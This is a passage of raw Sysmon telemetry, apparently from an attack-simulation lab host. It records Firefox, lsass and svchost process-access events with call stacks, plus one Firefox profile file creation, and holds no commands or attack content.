Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.489{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.474{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.474{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.474{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1016ae2|C:\Program Files\Mozilla Firefox\xul.dll+2bc816d|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.446{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.445{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.433{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.433{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000016806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.411{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\0LPNE0~1.DEF\pkcs11.txt2021-01-18 13:59:57.411 10341000x800000000000000016805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+244626|C:\Program Files\Mozilla Firefox\xul.dll+4d7733|C:\Program Files\Mozilla Firefox\xul.dll+4b7088d|UNKNOWN(000000238BDB4CF0) 10341000x800000000000000016804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+244626|C:\Program Files\Mozilla Firefox\xul.dll+4d7733|C:\Program Files\Mozilla Firefox\xul.dll+4b7088d|UNKNOWN(000000238BDB4CF0) 10341000x800000000000000016803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9 10341000x800000000000000016802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.395{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39bf2|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.380{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.380{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.380{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.364{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.364{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.364{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c78|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+2ed0ef0|C:\Program Files\Mozilla Firefox\xul.dll+2ecde71|C:\Program Files\Mozilla Firefox\xul.dll+2ecc384|C:\Program Files\Mozilla Firefox\xul.dll+2ec3074|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952A8B88)|UNKNOWN(FFFFD3D9952A880D)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+1764|C:\Windows\System32\USER32.dll+11baf|C:\Program Files\Mozilla Firefox\xul.dll+2e9d022 10341000x800000000000000016795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.364{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c51|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+2ed0ef0|C:\Program Files\Mozilla Firefox\xul.dll+2ecde71|C:\Program Files\Mozilla Firefox\xul.dll+2ecc384|C:\Program Files\Mozilla Firefox\xul.dll+2ec3074|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952A8B88)|UNKNOWN(FFFFD3D9952A880D)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+1764|C:\Windows\System32\USER32.dll+11baf|C:\Program Files\Mozilla Firefox\xul.dll+2e9d022 10341000x800000000000000016794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.364{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c26|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+2ed0ef0|C:\Program Files\Mozilla Firefox\xul.dll+2ecde71|C:\Program Files\Mozilla Firefox\xul.dll+2ecc384|C:\Program Files\Mozilla Firefox\xul.dll+2ec3074|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952A8B88)|UNKNOWN(FFFFD3D9952A880D)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+1764|C:\Windows\System32\USER32.dll+11baf|C:\Program Files\Mozilla Firefox\xul.dll+2e9d022 10341000x800000000000000016793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla 